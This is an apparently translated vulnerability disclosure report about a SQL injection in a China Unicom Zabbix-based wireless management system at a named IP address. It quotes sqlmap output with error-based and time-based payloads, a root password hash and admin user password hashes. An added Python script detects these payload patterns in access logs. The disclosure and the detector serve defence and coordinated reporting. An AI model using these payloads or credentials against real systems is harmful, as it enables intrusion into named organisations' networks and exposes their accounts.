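2015-01-26: Details reported to the vendor; awaiting vendor handling
2015-01-30: Vendor confirmed; details disclosed to the vendor only
2015-02-09: Details disclosed to core white hats and experts in related fields
2015-02-19: Details disclosed to regular white hats
2015-03-01: Details disclosed to trainee white hats
2015-03-12: Details disclosed to the public
A SQL injection vulnerability in a China Unicom wireless management system allows logging in to the admin backend and thereby controlling the China Unicom APs at Cangzhou Agricultural University, Botou Normal School, Renqiu Shanghai Grand Hotel, the Renqiu Government Guesthouse, Renqiu Lejia Hotel and the Renqiu Unicom office building.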
1#
http://221.195.55.178
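This system is a zabbix monitoring system, and this version has a SQL injection vulnerability that allows logging in to the backend to control the APs. Injection point: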
http://221.195.55.178/httpmon.php?applications=2
sqlmap identified the following injection points with a total of 286 HTTP(s) requests:
---
Parameter: applications (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: applications=2 AND (SELECT 9322 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (CASE WHEN (9322=9322) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: applications=2 AND SLEEP(5)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0

current user is DBA: True
database management system users password hashes:
[*] root [2]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    password hash: NULL
available databases [6]:
[*] bnmsdb
[*] information_schema
[*] logdb
[*] mysql
[*] reportdb
[*] test

Database: bnmsdb
Table: users
[3 entries]
+---------+----------------------------------+
| name    | passwd                           |
+---------+----------------------------------+
| admin   | 6a8d294a3c408fa10f4627bbbc276221 |
| czlt    | 8d08e029de80bd4e268edac90cd2cdbe |
| Default | d41d8cd98f00b204e9800998ecf8427e |
+---------+----------------------------------+
2# Log in to the backend
Upgrade the system.
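
The two payload types recorded in the sqlmap output under 1# leave recognisable traces in the web server's access log. The Python script below is an added example, not part of the original report: it scans Apache combined-format log lines for requests to httpmon.php whose applications parameter is not a plain number and labels the error-based and time-based patterns. The log lines, client IPs and the rule that a legitimate value is a comma-separated list of integers are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (documentation IPs, not from the report).
SAMPLE_LOG = """\
198.51.100.7 - - [26/Jan/2015:10:01:02 +0800] "GET /httpmon.php?applications=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jan/2015:10:02:10 +0800] "GET /httpmon.php?applications=2%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "-"
203.0.113.9 - - [26/Jan/2015:10:02:11 +0800] "GET /httpmon.php?applications=2%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 812 "-" "-"
198.51.100.7 - - [26/Jan/2015:10:03:00 +0800] "GET /httpmon.php?applications=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate value is one integer or a comma-separated list of integers.
NUMERIC = re.compile(r"\d+(,\d+)*")
# Patterns taken from the two payload types in the sqlmap output on this page.
SIGNATURES = {
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I),
    "time-based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}

def classify(value):
    """Return labels for a decoded parameter value; an empty list means it looks benign."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if hits:
        return hits
    return [] if NUMERIC.fullmatch(value) else ["non-numeric"]

def scan(log_text, page="/httpmon.php", param="applications"):
    """Return (client_ip, label, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a GET/POST line in combined format
        ip, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != page:
            continue
        # parse_qsl percent-decodes, so encoded payloads are matched in clear text.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.split("[")[0] == param:  # also covers applications[]=...
                findings.extend((ip, label, value) for label in classify(value))
    return findings

def summarize(findings):
    return Counter((ip, label) for ip, label, _ in findings)

if __name__ == "__main__":
    for (ip, label), n in summarize(scan(SAMPLE_LOG)).items():
        print(f"{ip}\t{label}\t{n}")
```

A "non-numeric" hit without a signature match is still worth reviewing, since it means the parameter received input the application should have rejected before building the query.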
Severity: High
Vulnerability Rank: 13
Confirmation time: 2015-01-30 09:46
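CNVD confirmed and reproduced the vulnerability as described; it has been passed to CNCERT and issued to the Hebei branch center, which will follow up and coordinate with the organization that manages the site to handle it.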
None yet